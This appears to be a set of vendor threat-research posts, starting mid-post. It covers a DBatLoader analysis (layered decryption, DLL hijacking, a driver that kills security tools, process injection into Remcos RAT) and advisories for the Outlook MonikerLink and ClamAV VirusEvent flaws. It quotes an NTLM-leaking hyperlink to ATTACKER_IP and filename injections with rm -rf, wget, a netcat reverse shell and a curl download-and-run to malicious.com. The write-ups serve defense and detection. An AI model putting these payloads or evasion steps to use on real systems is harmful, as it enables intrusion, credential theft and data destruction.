  • https://transfer[.]sh/get/LCRJGyiNOh/Muyjskpj.mp4

A connection is established and the malware will attempt to connect constantly. At the time of writing, this page currently results in a 403/Not Found and does not download a payload.

Figure 7: Active connection established

Figure 8: Sample attempts a connection multiple times per second

Figure 9: Directly going to the page leads to a ‘Not Found’ page

However, when the sample is not running, the connection is actively refused. This indicates that the ‘Not Found’ page is likely activated and not an actual 403/Not Found page. OSINT research shows that the IP has been used with a variety of other malware families, including AgentTesla, XmRig, AveMaria and others.

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

  • MalAgent.Marsilia

IOCs

  • 36ed94fb9f8ef3f5cbf8494ff6400d0be353ae7c223ed209bd85d466d1ba1ff7
  • http://transfer[.]sh/get/LCRJGyiNOh/Muyjskpj.mp4
  • http://163.5.169[.]28/cmt.exe
  • http://163.5.64[.]41/test.exe

Latest DBatLoader Uses Driver Module to Disable AV/EDR Software

Overview

Threat actors are continuously evolving their malware code to protect them against security defenses. SonicWall Capture Labs threat research team has observed that the latest variant of DBatLoader has included an old version of RogueKiller Antirootkit Driver which is used by the malware to terminate security software. The malware majorly delivers Remcos RAT, but is also known for delivering other malware. The malware is received inside an archive as an email attachment and is highly obfuscated, containing multiple layers of encryption data.

First Layer

The malware starts its execution with a call to the OpenURL API and, based on the return value, the malware initializes a string value which is used in the obfuscation code. The malware is full of obfuscated code which pretends to be an API hooking code but does not hook any API. Sometimes the obfuscated code fails by calling a Unicode argument expecting API with an ASCII value and sometimes it just modifies the API address in its own memory array. The malware also contains multiple concatenation, copy and move instructions before calling the fake API hooking module. The malware contains a GIF image which contains an encrypted second layer executable.

Figure 1: Obfuscation code

Not a True Image Steganography

In old variants, it was observed that the malware kept a GIF image in the resource data, but in the latest variant, the GIF file is kept in the file itself to avoid detection from the security software. The GIF image contains an encrypted next-layer executable which is not hidden in the pixel’s data but is actually in the additional bytes in the GIF image and does not alter the image’s visuals. The malware reads the GIF image bytes and searches for the delimiter string “< <” (0x3C 0x20 0x3C), to get a total of nine chunks of bytes separated by the delimiter.  The seventh chunk of bytes is the encrypted second-layer executable.

Figure 2: GIF Image

The decryption logic involves the addition of value 0x6B into the encrypted bytes to get the second layer executable.

Figure 3: Decryption logic in first layer executable

The malware allocates memory in the self process using the API ZwAllocateVirtualMemory to load the decrypted binary sections. The malware fixes the relocations, resolves imports and transfers control of the entry point of the second-layer executable.

Figure 4: Computes entrypoint

Second Layer

The malware starts by calling the timeSetEvent API to delay a callback function execution with 2710h milliseconds and additionally uses the argument constant TIME_ONESHOT for a one-time execution of the callback function which further continues the malicious execution. The malware checks the client’s internet status using the API InetIsOffline and, based on the return value, the malware initializes a string that is used in obfuscation code like the first layer executable.

The malware extracts the current executable name without the extension and appends “.png” to check its presence in the current directory. The checked PNG file is not available for the current variant, however, examining the code, the PNG file is expected to contain a list of URLs in plaintext. As the PNG file is not available, the malware reads the current executable file and searches for the “^^Nc” delimiter to retrieve the list of encrypted URLs and a key to decrypt URLs which is “202” in the current variants.

Figure 5: Delimiter to separate the URL list and key

The URL list is decrypted by adding the value 0x43 (202-0x10D) to the encrypted bytes. The decrypted URL list is separated by the delimiter “@^@”. The malware has structure to keep three URLs but in the current variant only one URL is available and other URLs are initialized with the values “Link2” and “Link3”.

Figure 6: First layer decryption used to decrypt URLs

The malware sequentially checks for an active URL using the API InternetCheckConnectionA from the decrypted list of URLs. Instead of using conventional APIs to download a file from a URL, the malware retrieved the COM library “winhttpcom.dll” CLSID for “WinHttp.WinHttpRequest.5.1” using the API CLSIDFromProgID and instantiates its object using the API CoCreateInstance.

Figure 7: COM library used for downloading data

Figure 8: URLs to download data

The malware now downloads data from the URL: “h[t][t]ps://nbtp1[.]sa[.]com/youtubedrivedocumentsuploadgoogledownloaduptowns/202_Pblednxqcpj” using APIs from the COM library “winhttpcom.dll”. It also checks for downloaded bytes size which should be more than 0x7530.

Figure 9: Downloaded encrypted data

Downloaded data contains multiple executable files associated with the malware along with configuration data and an additional malware payload executable which is Remcos RAT in the current variant. Before Base64 encoding, configuration data and other associated binary executables are two layers encrypted but the additional malware executable contains a total of five layers of encryption.

The first layer is decrypted using the same logic which was used to decrypt the list of URLs by adding 0x43 value into the encrypted data. The second layer decryption logic checks the encrypted byte if it is greater than 7F (0x21+0x5E) then the encrypted byte is added to 0x0E, divided by 0x5E and then added by 0x21 to get the decrypted byte:

Figure 10: Second layer decryption

The decrypted data is separated by the delimiter “*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@” which contains the following information:

  • Decryption key for the additional malware
  • File name used for persistence entry
  • Encrypted additional malware (Remcos RAT)
  • Configuration Data
  • Old version of Exchange ActiveSync Invoker (easinvoker.exe) vulnerable to DLL hijacking
  • Malicious netutils.dll for privileged execution
  • Old version of RogueKiller Antirootkit Driver (truesight.sys) to terminate security software

Figure 11: Downloaded decrypted data

Persistence

The malware drops a self-copy into “C:\Users\Public\Libraries\Pblednxq.PIF” and creates a Windows Shortcut File (LNK) file “C:\Users\Public\Pblednxq.url” which tries to execute the dropped self-copy of the malware.

Figure 12: Windows shortcut file

The malware creates the registry entry “SOFTWARE\\Microsoft\\Windows\\CurrentVersion\Run\Pblednxq” for the current user and sets the value to the dropped LNK file path:

Figure 13: Persistence entry

Privilege Escalation

The malware drops easinvoker.exe, netutils.dll and truesignt.sys from the downloaded data into the directory “C:\Users\Public\Libraries”. The old version of Exchange ActiveSync Invoker (easinvoker.exe) is vulnerable to relative path DLL hijacking which loads malicious netutils.dll from the current directory on execution. The old version of RogueKiller Antirootkit Driver (truesight.sys) is a kernel driver file that terminates protected processes associated with the provided process ID. The malware also drops two batch files PblednxqO.bat and KDECO.bat into “C:\Users\Public\Libraries” and executes “PblednxqO.bat” using the API WinExec.

Figure 14: Obfuscated PblednxqO.bat

After de-obfuscating the batch file “PblednxqO.bat”, it becomes legible. The batch script creates the directory “C:\Windows ” which contains additional space to take advantage of mocking a trusted directory method for privilege escalation. The malware copies the files easinvoker.exe, netutils.dll and KDECO.bat from the directory “C:\Users\Public\Libraries” to directory “C:\Windows \System32” and starts privileged mode execution for the easinvoker.exe process.

Figure 15: Simplified PblednxqO.bat

The malware now deletes used files that are no longer needed from the “C:\Users\Public\Libraries” and “C:\Windows \System32” directories, leaving files that are being used for persistence and further execution.

Figure 16: Deleting used files

The batch script has already executed the easinvoker.exe process and the malware also executes the easinvoker.exe using the API WinExec as a backup plan which loads malicious netutils.dll.

Figure 17: Starts easinvoker.exe

EDR Evasion

DLLMain function in “netutils.dll” contains a fake API hooking obfuscation which invokes the API LoadLibraryW using the filename “Amsi” as an ASCII string. The LoadLibraryW API expects the Unicode string as an argument and is provided with an ASCII string which causes failure of the API. The code intended for API hooking is never executed.

Figure 18: Fake API hooking obfuscation

The malware executes “C:\Windows \System32\KDECO.bat” using the API WinExec which is obfuscated similarly as “PblednxqO.bat”.

Figure 19: Executes KDECO.bat

After obfuscating, the batch script becomes legible. The batch script executes a PowerShell cmdlet to exclude the directory “C:\Users” from Windows Defender’s scanning. The batch script also registers and starts “C:\Users\Public\Libraries\truesight.sys” as a kernel mode driver.

Figure 20: Simplified KDECO.bat

The malware contains list of 49 security software processes which are checked against the running processes to retrieve the process ID.

Figure 21: 49 security processes

The retrieved process ID is sent to the driver component which terminates the associated running process.

Figure 22: Sends process ID to the kernel driver

TrueSight RogueKiller Antirootkit Driver

The driver component truesight.sys file with version 3.3.0 used by the malware belongs to RogueKiller AntiMalware software by Adlice Software. The kernel driver terminates protected processes associated with the process ID sent by the netutils.dll binary. Truesight.sys version 3.4 is fixed to avoid killing protected processes.

Process Injection

Even after two layers of decryption for the downloaded data, the Remcos RAT payload executable is still encrypted. For the next layer of decryption, the malware retrieves key bytes from the downloaded data. The decryption involves XOR operations with encrypted byte, encrypted bytes size, key byte and key bytes size to get the next level of decrypted bytes which are then reversed.  The reversed bytes are decrypted using the same decryption logic, which was used to decrypt the downloaded data to finally get the Remcos RAT executable.

Figure 23: third layer decryption used to decrypt payload

The malware has a list of file names to inject the final payload executable. The malware selects one file from the list and checks its presence in “c:\windows\system32” to start the process. If the file is not found, then the malware has a backup file name “iexpress.exe” to start as a process.

  • SndVol.exe
  • colorcpl.exe
  • wusa.exe

Figure 24: List of processes to inject payload

The malware starts the process “C:\Windows\System32\colorcpl.exe” for the current execution and enumerates the running processes using APIs CreateToolhelp32Snapshot, Process32First and Process32Next to get the handle for the process name “colorcpl.exe”.

Figure 25: Executes colorcpl.exe

Figure 26: Enumerates running processes to get colorcpl.exe

The malware loads the decrypted Remcos RAT executable into the memory and writes the memory into “colorcpl.exe” using the API NtWriteVirtualMemory. It then starts a thread at the entry point using the API RtlCreateUserThread.

Figure 27: Write process memory

Figure 28: Starts thread in injected process

Microsoft Outlook Remote Code Execution Vulnerability

Overview

SonicWall Capture Labs Threat Research Team became aware of the MonikerLink Remote Code Execution vulnerability (CVE-2024-21413) in Microsoft Outlook, assessed its impact and developed mitigation measures for the vulnerability.

Microsoft Outlook is a globally acclaimed personal information management software from Microsoft. A MonikerLink vulnerability was observed in the Microsoft Outlook email client. The flaw arises in how Outlook handles specific hyperlinks, allowing remote attackers to execute arbitrary code on the victim’s system. Threat actors can bypass Outlook’s security protocols by manipulating the URL linked with the hyperlink, leading it to take control of the victim’s system or gain unauthorized access.

Product Versions Impacted

A list of all impacted product versions:

  • Microsoft Office 2016 (64-bit edition)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office LTSC 2021 for 32-bit editions
  • Microsoft Office LTSC 2021 for 64-bit editions
  • Microsoft 365 Apps for Enterprise for 64-bit Systems
  • Microsoft 365 Apps for Enterprise for 32-bit Systems
  • Microsoft Office 2019 for 64-bit editions
  • Microsoft Office 2019 for 32-bit editions

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2024-21413.

The CVSS score is 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

This vulnerability, dubbed as the “MonikerLink bug,” misuses the Component Object Model (COM) of Windows, leading to a local New Technology LAN Manager (NTLM) credential leak and the possibility of remote code execution. The threat actors can leverage CVE-2024-21413 to execute the arbitrary code by circumventing the security protocols of the email client. Security measures such as DKIM (DomainKeys Identified Mail), DMARC (Domain-based message authentication, Reporting and Conformance) and SPF (Sender Policy Framework) that are designed to eradicate issues like spoofing, forged addresses and more are part of SMTP authentication. This flaw uses SMTP authentication to ensure the bypassing and circumvention of email security mechanisms.

Microsoft Outlook can parse hyperlinks such as HTTP/HTTPS. Furthermore, Outlook does have its own security mechanisms, like “Protected View” and “Preview Pane” while handling emails specifically with attachments or hyperlinks. With its security features, it either displays a warning message or prompt with a security warning when applications other than HTTP/HTTPS are triggered as shown in Figure 1.

 

Figure 1: Outlook’s Protected View Security Warning

The “Protected View” feature usually blocks macros and is more prompted when the emails are from outside an organization.

Basically, Moniker is a COM object that is used to create instances or other objects. It can be implemented as an object or link one document to another when using various COM-based functions. When using a common protocol file:// moniker link into a hyperlink, the user can instruct Outlook to access a file over the network, wherein SMB protocol will be used involving local NTLM authentication.

<p><a href=”file://ATTACKER_IP/test”>CVE-2024-21413</a></p>

A simple tweak like using a special character such as “!” and additional text in the above moniker link leads to triggering this vulnerability.

Triggering the Vulnerability

Triggering this NTLM leak vulnerability in Microsoft Outlook requires a specially crafted Moniker Link to bypass Outlook’s Protected View. CVE-2024-21413 exploits the MkParseDisplayName API, a function that parses a human-readable name into a moniker that can be used to identify a link source. The moniker can be as simple as file:// moniker.  The vulnerability can be triggered by modifying the hyperlink with the “!” special character and additional text in the Moniker Link below:

<p><a href=”file://ATTACKER_IP/test!exploit”>CVE-2024-21413</a></p>

This bypasses Outlook’s Protected View and leads to an authentication attempt via SMB protocol, sending the victim’s Windows netNTLMv2 hash to the attacker. This event of 1-click RCE is demonstrated in Figure 2.

Figure 2: One-click RCE

Exploitation

While exploiting this vulnerability, the crucial part is the click by the victim on the malicious hyperlink sent over email. There has been a PoC update that doesn’t require user interaction at all to exploit this vulnerability making it a 0-click NTLM leak.

In the demonstration part, Outlook does prompt a warning box, but it is not much of the issue part.

Figure 3: Outlook Tested Version

The exploit demonstrated in Figure 2 follows a series of steps in a fraction of time:

  • A script that sends a malicious email to the victim’s email client through the attacker’s email client.
  • Setting up an SMB listener and running the PoC
  • Victims click on the specially crafted link received over email.
  • Capture the hash and login of the victim (without the warning prompt on the affected Outlook version)

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:

  • IPS:4305 Microsoft Outlook MONIKERLINK Security Feature Bypass
  • IPS:4307 Microsoft Outlook MONIKERLINK Security Feature Bypass 2

Remediation Recommendations

Considering the severe consequences of this vulnerability, the users of affected products are strongly encouraged to apply the patches as published in the vendor advisory.

Relevant Links

ClamAV ClamD Service

SonicWall Capture Labs Threat Research Team became aware of the ClamAV VirusEvent command injection vulnerability (CVE-2024-20328), assessed its impact, and developed mitigation measures for the vulnerability.

ClamAV is a notable, open-source anti-virus engine, widely recognized for its comprehensive suite of security solutions. It offers an array of features, including web and email scanning capabilities, endpoint security, a multi-threaded daemon, command line scanning tools, and an automatic database update service. The software boasts extensive support for various file formats, including zip, PE, rar, dmg, tar, GZIP, Bzip2, OLE2, MS Office and pdf, among others. This broad compatibility ensures that ClamAV can effectively scan and detect potential threats across a wide range of documents and files, providing robust protection against malware and viruses.

Recently, a significant security concern has emerged with the discovery of a command injection vulnerability within ClamAV. This flaw arises from the software’s mishandling of input intended for the generation of command strings. By exploiting this vulnerability, a remote attacker can orchestrate an attack by dispatching a malicious file or email to a system protected by ClamAV. If the tainted content is scanned by the compromised software, the attacker could achieve arbitrary code execution, operating under the privileges of the user running the “clamd” service. This exposes the affected systems to potential unauthorized access and control, underlining the critical need for immediate remediation and updates to safeguard against such vulnerabilities.

Product Versions Impacted

  • ClamAV 0.104 (all minor updates)
  • ClamAV 0.105 (all minor updates)
  • ClamAV 1.0.0 through 1.0.4 (LTS)
  • ClamAV 1.1 (all minor updates)
  • ClamAV 1.2.0
  • ClamAV 1.2.1

CVE Details

This security issue has been formally acknowledged and indexed in the Common Vulnerabilities and Exposures (CVE) system as CVE-2024-20328.

Due to its association with significant vulnerabilities in ClamAV, CVE-2024-20328 was given an overall CVSS score of 7.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L/E:U/RL:O/RC:C), indicating a high level of severity. This score is derived from a base score of 8.3, reflecting the vulnerability’s critical aspects and its implications for security. The detailed metrics reveal that the attack vector is via network, allowing potential exploitation from remote locations. The low attack complexity indicates that attackers can exploit the vulnerability with minimal effort, without requiring any privileges or user interaction, thereby widening the scope of potential attackers. The change in scope signifies that the impact of the vulnerability extends beyond the initially compromised component. Its impacts on data confidentiality, integrity and availability are all assessed as low, suggesting that while exploitation could compromise data or service, it does not lead to total loss or exposure of data.

The temporal score of 7.2 factors in the current status of the vulnerability’s exploit code maturity as unproven, indicating that there might not yet be any known exploits in the wild or that exploitation is not straightforward. The official fix at the remediation level points to the availability of patches or updates to mitigate the vulnerability, while the confirmed report confidence confirms the reliability of the reported vulnerability details.

Technical Overview

On January 2, 2024, a significant vulnerability was discovered within ClamAV, the widely utilized open-source antivirus engine. This vulnerability, arising from a command injection flaw in the VirusEvent feature of ClamAV, allows for the execution of arbitrary code on systems employing ClamAV for scanning purposes, particularly in environments like mail servers. The issue originates from the handling of crafted filenames, which, when scanned and identified as malicious by ClamAV, can trigger the execution of unauthorized commands on the system running the ClamAV daemon (clamd), all without necessitating any user interaction. This vulnerability thus presents a severe security risk, as it enables remote attackers to compromise the affected systems discreetly.

The core of the vulnerability lies in the VirusEvent feature’s functionality (See Figure 1), which is designed to execute a specified command upon the detection of a virus, using a format that incorporates placeholders for the virus name (“%v”) and the filename (“%f”). However, the critical oversight is the lack of sanitization for the filename input, permitting attackers to embed malicious commands within the filenames. These commands are then executed with the privileges of the user running clamd, as demonstrated in the clamd_others.c file’s virusaction function. This function, intended to facilitate the VirusEvent operation, constructs an environment where the PATH is set, along with variables for the filename and virus name, before dynamically building and executing a command string that includes the unsanitized filename, leading directly to the vulnerability.

Figure 1 – VirusEvent logic

Exploitation of this vulnerability can be illustrated through a configured VirusEvent in clamd.conf (See Figure 2), such as “echo VIRUS DETECTED: %v in the path %f >> /dev/stdout”. A specially crafted filename, like “# xmrig;whoami;”, can manipulate this feature to execute unintended commands, as seen in the execution output, where the command injection leads to the display of the virus detection message alongside the execution of the “whoami” command, revealing the system’s user context. This exploit underscores the imperative need for stringent input validation and the immediate application of security patches to address such vulnerabilities, safeguarding systems against potential remote attacks leveraging the ClamAV VirusEvent feature.

Figure 2 – clamd.conf entry

Triggering the Vulnerability

The ClamAV command injection vulnerability, identified in its VirusEvent feature, can be triggered under various scenarios, exploiting the lack of sanitization in the way command strings are constructed and executed. Here are four specific conditions or methods an attacker might use to exploit this vulnerability:

Embedded Commands in File Names:
Attackers might embed shell commands in file names (e.g., evilfile;rm -rf /;), which ClamAV could execute due to insufficient input sanitization in the VirusEvent feature.

Manipulating Environment Variables:
Crafted file names could manipulate environment variables to execute arbitrary commands (e.g., $(wget http://malicious.com/script.sh)), exploiting the direct passage of unsanitized command strings to a shell.

File Path Manipulation:
Attackers could include command injection payloads in file paths (e.g., /uploads/innocuous.pdf;nc -e /bin/bash attacker_ip 4444), effective in environments where ClamAV scans attacker-accessible directories.

Bypassing Command Execution Restrictions:
In restricted environments, attackers could bypass controls by crafting file names that initiate benign commands followed by malicious payloads (e.g., legitfile;curl http://malicious.com/malware -o /tmp/malware; chmod +x /tmp/malware; /tmp/malware), utilizing the VirusEvent feature for execution.

The methods above demonstrate the critical importance of validating and sanitizing all inputs in security mechanisms like ClamAV’s VirusEvent to prevent unauthorized command execution.

Exploitation

The exploitation of ClamAV’s vulnerability primarily centers on manipulating the virusaction function, especially the sequence following the vfork() system call. This function is tasked with responding to virus detection events and dynamically constructs a command string using input parameters, such as filenames and virus names, without adequately sanitizing them. The segment of code where exploitation is most critical involves the use of vfork() to spawn a new process. In the child process, identified when pid == 0, it proceeds to execute a shell command built from potentially unsafe user input via execle().

The vfork() call is crucial because it creates a new process by duplicating the address space of the calling process, allowing the child process to run in the same memory space as the parent until execle() is called. This approach is chosen for its efficiency, as it avoids the overhead of copying the entire address space of the parent process. However, the subsequent execution of a command with user-controlled input in a shell environment (/bin/sh) through execle() presents the vulnerability. The command buffer_cmd is executed in the shell without any sanitization, enabling arbitrary command execution if an attacker crafts malicious input that breaks out of the intended context.

Thus, this exploitation pathway permits attackers to run arbitrary code on systems operating ClamAV by inserting commands into filenames or other inputs processed by ClamAV, which are then included in buffer_cmd. Given that the command runs with the privileges of the ClamAV service, this vulnerability could lead to significant security incidents, including unauthorized system access, data exfiltration, or further system compromises. The specific line (See Figure 3) in the virusaction function becomes a focal point for security concerns, highlighting the critical need for strict input validation and sanitization in applications that execute commands based on external inputs.

Figure 3 – vfork() call and surrounding logic

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 4281 ClamAV VirusEvent Command Injection

Visualizing Security: The Threat Graph

Remediation Recommendations

The risks posed by this vulnerability can be mitigated or eliminated by:

  • Applying the vendor-supplied patch to eliminate this vulnerability
  • Utilizing up-to-date IPS signatures to filter network traffic
  • Configuring the vulnerable product to allow access to trusted clients only
  • Keeping security software and systems current for optimal defense
  • Conducting regular security audits to identify and remediate potential weaknesses

Relevant Links

Vendor Advisory
NIST NVD CVE
CWE-78
NIST CVSS Calculator Score